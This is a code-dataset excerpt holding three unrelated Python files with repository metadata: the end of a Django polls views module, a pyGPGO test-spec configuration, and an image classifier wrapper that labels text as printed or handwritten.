def get_queryset(self):
"""Return the last five published questions."""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""Excludes any questions that aren't published yet."""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=request.POST['choice'])
except(KeyError, Choice.DoesNotExist):
return render(request,
'polls/detail.html',
{'question': p,
'error_message': "You didn't select a choice."
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results',
args=(p.id,)))
| 31.1
| 69
| 0.649518
|
293f83cbe614908d50284bb095b8cc08b77023d8
| 1,618
|
py
|
Python
|
tool/testspec_1c718d7f2bdb95d407b27412b25471c762355832.py
|
uiuc-arc/tera
|
9ceece9aa29fd58903c6e8fa5e65fce555f55d7c
|
[
"MIT"
] | 2
|
2021-07-01T11:57:28.000Z
|
2022-03-29T19:29:01.000Z
|
tool/testspec_c21120ffd974029485877dcebafb2c0b930e1f16.py
|
uiuc-arc/tera
|
9ceece9aa29fd58903c6e8fa5e65fce555f55d7c
|
[
"MIT"
] | null | null | null |
tool/testspec_c21120ffd974029485877dcebafb2c0b930e1f16.py
|
uiuc-arc/tera
|
9ceece9aa29fd58903c6e8fa5e65fce555f55d7c
|
[
"MIT"
] | null | null | null |
from src.lib.TestSpec import Spec
from src.lib.AssertSpec import AssertSpec
from src.lib.AssertType import AssertType
from src.lib.Param import Param
from src.lib.ParamType import ParamType
from src.lib.Test import Test
import libraries
testspecs = [Spec(
repo="pyGPGO",
filename="{0}/projects/pyGPGO/tests/test_GPGO.py".format(
libraries.PROJECT_DIR),
classname="none",
testname="test_GPGO_mcmc",
params=[
Param(
name="niter",
param_line=30,
param_col=56,
param_type=ParamType.ITER,
default_val=100,
value_range=[1, 100],
steps=1
),
Param(
name="max_iter",
param_line=34,
param_col=22,
param_type=ParamType.ITER,
default_val=10,
value_range=[1, 10],
steps=1
),
],
assertions=[
AssertSpec(
test=Test(testname=None,
classname=None,
filename="{0}/projects/pyGPGO/tests/test_GPGO.py".format(
libraries.PROJECT_DIR)
),
line=36,
col_offset=-1,
assert_type=AssertType.ASSERT_ALLCLOSE,
assert_string="np.testing.assert_allclose(res['x'], 0.75, atol=0.05)",
args=[]
)
],
branchname="before_1c718d7f2bdb95d407b27412b25471c762355832"
)]
| 30.528302
| 86
| 0.495674
|
07b9d0bdcfb8330466edea9deb7cfc89c37bf0c0
| 2,985
|
py
|
Python
|
textkind/classify.py
|
caltechlibrary/documentarist
|
055ad42f623c7affb584a6004e1bdba73d6312ac
|
[
"BSD-3-Clause"
] | 10
|
2020-04-27T19:12:14.000Z
|
2022-02-11T07:06:17.000Z
|
textkind/classify.py
|
caltechlibrary/documentarist
|
055ad42f623c7affb584a6004e1bdba73d6312ac
|
[
"BSD-3-Clause"
] | null | null | null |
textkind/classify.py
|
caltechlibrary/documentarist
|
055ad42f623c7affb584a6004e1bdba73d6312ac
|
[
"BSD-3-Clause"
] | 2
|
2020-04-27T19:12:21.000Z
|
2021-03-15T10:47:16.000Z
|
'''
classify.py: interface to classifier engine
Authors
-------
Michael Hucka <mhucka@caltech.edu> -- Caltech Library
Copyright
---------
Copyright (c) 2020 by the California Institute of Technology. This code
is open-source software released under a 3-clause BSD license. Please see the
file "LICENSE" for more information.
'''
from math import exp
from os import path
import pickle
from PIL import Image
from sidetrack import log, logr
import sys
sys.path.append('../common')
from common.ui import UI, inform, warn, alert, alert_fatal
from common.exceptions import *
sys.path.append('printed_vs_handwritten')
from printed_vs_handwritten import ocrd_typegroups_classifier
from printed_vs_handwritten.ocrd_typegroups_classifier.typegroups_classifier import TypegroupsClassifier
# Constants.
# .............................................................................
_TGC_MODEL_FILE = 'classifier.tgc'
# Class definitions.
# .............................................................................
class TextKindClassifier():
def __init__(self):
pickled_class = path.join('printed_vs_handwritten',
'ocrd_typegroups_classifier',
'models', 'classifier.tgc')
self._classifier = TypegroupsClassifier.load(pickled_class)
def classify(self, inputs):
'''Analyzes images for handwritten or printed text.
If given a single image or file, analyzes it and returns a single
result. If given a list, returns an iterator over the results of
analyzing each individual image or file.
'''
if isinstance(inputs, (list, tuple)):
return self.classify_list(inputs)
elif isinstance(inputs, Image.Image):
return self.classify_image(inputs)
else:
return self.classify_file(inputs)
def classify_list(self, inputs):
for item in inputs:
yield self.classify(item)
def classify_file(self, file):
if __debug__: log(f'classifying file {file}')
with Image.open(file, 'r') as image:
return self.classify_image(image)
def classify_image(self, image):
file = image.filename if hasattr(image, 'filename') else None
if __debug__: log(f'classifying image {image} (from {file})')
# The classifier has a hardwired assumption that the inputs have
# 3 channels. If we get a grayscale image, we have to convert it.
image = image.convert('RGB')
data = self._classifier.classify(image, 75, 64, False)
kind = 'printed' if data['printed'] > data['handwritten'] else 'handwritten'
results = {'text kind': kind,
'printed': data['printed'],
'handwritten': data['handwritten']}
if file:
results['file'] = file
if __debug__: log('image classification results = {}', results)
return results
| 31.421053
| 106
| 0.621776
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.